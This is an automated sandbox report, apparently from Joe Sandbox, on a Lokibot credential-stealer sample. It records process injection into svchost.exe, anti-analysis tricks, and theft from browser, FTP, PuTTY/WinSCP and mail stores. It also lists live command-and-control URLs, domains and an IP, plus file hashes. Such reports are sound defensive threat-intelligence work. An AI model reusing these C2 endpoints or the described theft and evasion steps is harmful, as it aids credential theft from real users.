Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

API/Special instruction interceptor: Address: DF3224

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-105321

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

API coverage: 4.8 %

Source: C:\Windows\SysWOW64\svchost.exe TID: 5952

Thread sleep time: -660000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B9445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00B9445A
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B9C6D1 FindFirstFileW,FindClose,	0_2_00B9C6D1
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B9C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00B9C75C
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B9EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B9EF95
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B9F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B9F0F2
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B9F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B9F3F3
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B937EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B937EF
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B93B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B93B12
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B9BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B9BCBC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,	2_2_00403D74

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00B349A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00B349A0

Source: C:\Windows\SysWOW64\svchost.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: svchost.exe, 00000002.00000002.3383833840.0000000003400000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv

Source: C:\Users\user\Desktop\dfiCWCanbj.exe	API call chain: ExitProcess graph end node			graph_0-104569
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	API call chain: ExitProcess graph end node			graph_0-104788

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00BA3F09 BlockInput,

0_2_00BA3F09

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00B33B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00B33B3A

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00B65A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00B65A7C

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00B34B37 LoadLibraryA,GetProcAddress,

0_2_00B34B37

Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00DF34F0 mov eax, dword ptr fs:[00000030h]	0_2_00DF34F0
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00DF3490 mov eax, dword ptr fs:[00000030h]	0_2_00DF3490
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00DF1E70 mov eax, dword ptr fs:[00000030h]	0_2_00DF1E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003356A0 mov eax, dword ptr fs:[00000030h]	2_2_003356A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003356A0 mov ecx, dword ptr fs:[00000030h]	2_2_003356A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00334610 mov eax, dword ptr fs:[00000030h]	2_2_00334610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00334610 mov eax, dword ptr fs:[00000030h]	2_2_00334610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00334610 mov eax, dword ptr fs:[00000030h]	2_2_00334610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00334610 mov eax, dword ptr fs:[00000030h]	2_2_00334610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00334410 mov eax, dword ptr fs:[00000030h]	2_2_00334410
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00334410 mov eax, dword ptr fs:[00000030h]	2_2_00334410
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00333060 mov eax, dword ptr fs:[00000030h]	2_2_00333060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00333060 mov eax, dword ptr fs:[00000030h]	2_2_00333060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00333060 mov eax, dword ptr fs:[00000030h]	2_2_00333060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00333060 mov eax, dword ptr fs:[00000030h]	2_2_00333060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00333540 mov eax, dword ptr fs:[00000030h]	2_2_00333540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00333540 mov eax, dword ptr fs:[00000030h]	2_2_00333540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00333540 mov eax, dword ptr fs:[00000030h]	2_2_00333540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040317B mov eax, dword ptr fs:[00000030h]	2_2_0040317B

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00B880A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_00B880A9

Source: C:\Windows\SysWOW64\svchost.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B5A124 SetUnhandledExceptionFilter,	0_2_00B5A124
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B5A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00B5A155
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003333C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,	2_2_003333C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00335848 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00335848

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe

Network Connect: 104.21.80.1 80

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2E9B008

Jump to behavior

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00B887B1 LogonUserW,

0_2_00B887B1

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00B33B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00B33B3A

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00B348D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00B348D7

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00B94C27 mouse_event,

0_2_00B94C27

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\dfiCWCanbj.exe"

Jump to behavior

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00B87CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00B87CAF

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00B8874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00B8874B

Source: dfiCWCanbj.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: dfiCWCanbj.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00B5862B cpuid

0_2_00B5862B

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00B64E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00B64E87

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00B71E06 GetUserNameW,

0_2_00B71E06

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00B63F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00B63F3A

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00B349A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00B349A0

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 0.2.dfiCWCanbj.exe.3bf0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2150829579.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dfiCWCanbj.exe PID: 3580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3968, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000002.00000002.3383851438.0000000003421000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\SysWOW64\svchost.exe	Code function: PopPassword		2_2_0040D069
Source: C:\Windows\SysWOW64\svchost.exe	Code function: SmtpPassword		2_2_0040D069

Source: dfiCWCanbj.exe	Binary or memory string: WIN_81
Source: dfiCWCanbj.exe	Binary or memory string: WIN_XP
Source: dfiCWCanbj.exe	Binary or memory string: WIN_XPe
Source: dfiCWCanbj.exe	Binary or memory string: WIN_VISTA
Source: dfiCWCanbj.exe	Binary or memory string: WIN_7
Source: dfiCWCanbj.exe	Binary or memory string: WIN_8
Source: dfiCWCanbj.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 0.2.dfiCWCanbj.exe.3bf0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2150829579.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dfiCWCanbj.exe PID: 3580, type: MEMORYSTR

Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00BA6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	0_2_00BA6283
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00BA6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00BA6747
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00336BB0 RpcServerUnregisterIfEx,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status,	2_2_00336BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00336AF0 EnterCriticalSection,RpcServerListen,LeaveCriticalSection,I_RpcMapWin32Status,	2_2_00336AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00336B60 RpcServerUnregisterIf,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status,	2_2_00336B60

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Service Execution	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	3 Windows Service	2 Valid Accounts	2 Obfuscated Files or Information	2 Credentials in Registry	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	117 System Information Discovery	Distributed Component Object Model	21 Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	3 Windows Service	1 Masquerading	LSA Secrets	131 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	312 Process Injection	2 Valid Accounts	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	312 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
dfiCWCanbj.exe	55%	ReversingLabs	Win32.Trojan.Autoitinject
dfiCWCanbj.exe	62%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
http://touxzw.ir/sccc/five/fre.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
touxzw.ir	104.21.80.1	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://touxzw.ir/sccc/five/fre.php	true	Avira URL Cloud: malware	unknown
http://kbfvzoboss.bid/alien/fre.php	false		high
http://alphastand.win/alien/fre.php	false		high
http://alphastand.trade/alien/fre.php	false		high
http://alphastand.top/alien/fre.php	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.ibsensoftware.com/	svchost.exe, svchost.exe, 00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.80.1	touxzw.ir	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1619976
Start date and time:	2025-02-20 15:05:35 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	dfiCWCanbj.exe renamed because original name is a hash value
Original Sample Name:	62ABC4447D8B6877CAB7A721E0331450.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/6@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 57 Number of non-executed functions: 276
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:06:32	API Interceptor	60x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.80.1	laser (2).ps1	Get hash	malicious	FormBook	Browse	www.lucynoel6465.shop/jgkl/
	laser.ps1	Get hash	malicious	FormBook	Browse	www.tumbetgirislinki.fit/k566/
	QUOTATION REQUEST.exe	Get hash	malicious	FormBook	Browse	www.shlomi.app/t3l4/
	Quotation.exe	Get hash	malicious	FormBook	Browse	www.askvtwv8.top/uztg/
	SFT20020117.exe	Get hash	malicious	FormBook	Browse	www.fz977.xyz/7p42/
	PO #86637.exe	Get hash	malicious	FormBook	Browse	www.chinaen.org/mquw/
	ed.ps1	Get hash	malicious	FormBook	Browse	www.arryongro-nambe.live/x0gh/
	Updated Price List for 2025 Business Year.exe	Get hash	malicious	FormBook	Browse	www.sigaque.today/7c9r/
	Updated Price List for 2025 Business Year.exe	Get hash	malicious	FormBook	Browse	www.sigaque.today/7c9r/
	Demande de devis. Quote Request.exe	Get hash	malicious	FormBook	Browse	www.clouser.store/3r9x/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
touxzw.ir	Request for quotation -6001845515-XLSX.exe	Get hash	malicious	Lokibot	Browse	104.21.64.1
	vsf098633534.exe	Get hash	malicious	Lokibot	Browse	104.21.64.1
	scan_0219025_pdf.exe	Get hash	malicious	Lokibot	Browse	104.21.112.1
	scan_07022025_pdf.exe	Get hash	malicious	DarkTortilla, Lokibot	Browse	104.21.112.1
	specs_916351_xlsx.exe	Get hash	malicious	Lokibot	Browse	104.21.48.1
	specs_00235_xlsx.exe	Get hash	malicious	Lokibot	Browse	104.21.32.1
	specs_12788_xls.exe	Get hash	malicious	Lokibot	Browse	104.21.48.1
	LEmJJ87mUQ.exe	Get hash	malicious	Lokibot	Browse	172.67.134.88
	lf1SPbZI3V.exe	Get hash	malicious	Lokibot	Browse	188.114.97.3
	zxalphamn.doc	Get hash	malicious	Lokibot	Browse	188.114.96.9

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	New PO 127429.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
	https://www.flugger.pl	Get hash	malicious	Unknown	Browse	104.16.117.116
	http://www.forthright.com	Get hash	malicious	Unknown	Browse	104.17.223.152
	http://hrworld.org	Get hash	malicious	Unknown	Browse	188.114.97.3
	http://hrworld.org	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://d92.echospheure.ru/zeEEbl5y/	Get hash	malicious	Unknown	Browse	104.16.2.189
	vacuolize.bat	Get hash	malicious	AsyncRAT, XWorm	Browse	104.17.202.1
	BugSplat64.dll.dll	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.80.1
	https://files.documentinvoice-viewer.online/b7e1f2d3a9b2472a90b0f8dac3cc8a6c48648b1d8b5f7a9c2e1d3f4a7b97b5d6e3f1c843c8b6a8e9d5c2a7c3e9b0481b92c6d5e8a7b8c9c2d8a9b7f1e6c3a1d4c9b2	Get hash	malicious	HTMLPhisher	Browse	104.18.10.207
	http://111.sharpsites%5B.%5Dorg%5B.%5Duk/?png=LE0@@QDh/HxZFLz9MQGg6T0YmQTxJZEA/&x=/nKXdh/%23YWtuYXBwQHBhcmtlci5jb20=%22%3C/script	Get hash	malicious	Unknown	Browse	104.16.4.189

Process:	C:\Users\user\Desktop\dfiCWCanbj.exe
File Type:	data
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	7.3213980260130285
Encrypted:	false
SSDEEP:	1536:nCL63xGjirp2XTWCsRRZFeThIKjko3kIYa3NY07u+nN914+vRpZf8uejldHPVBLy:n0IKI9CVT7LqQu+N/bnZ0uejRBof
MD5:	20D12473655731F417606204864B7B2B
SHA1:	71C17AAD673E71C65284640312571D175614D460
SHA-256:	4C21ACF9E17FF1E1FD7D588AF64A740BD9495DFBDCF6A4D88ABD0D868DE09357
SHA-512:	21AA766434EABB715CD4720985E2CB533E9ED335ACA8497F82ACD744FE3221E81FB50B15B02D82D202F32A32A47CE949E37835D740BF4936F90B52E308757646
Malicious:	false
Reputation:	low
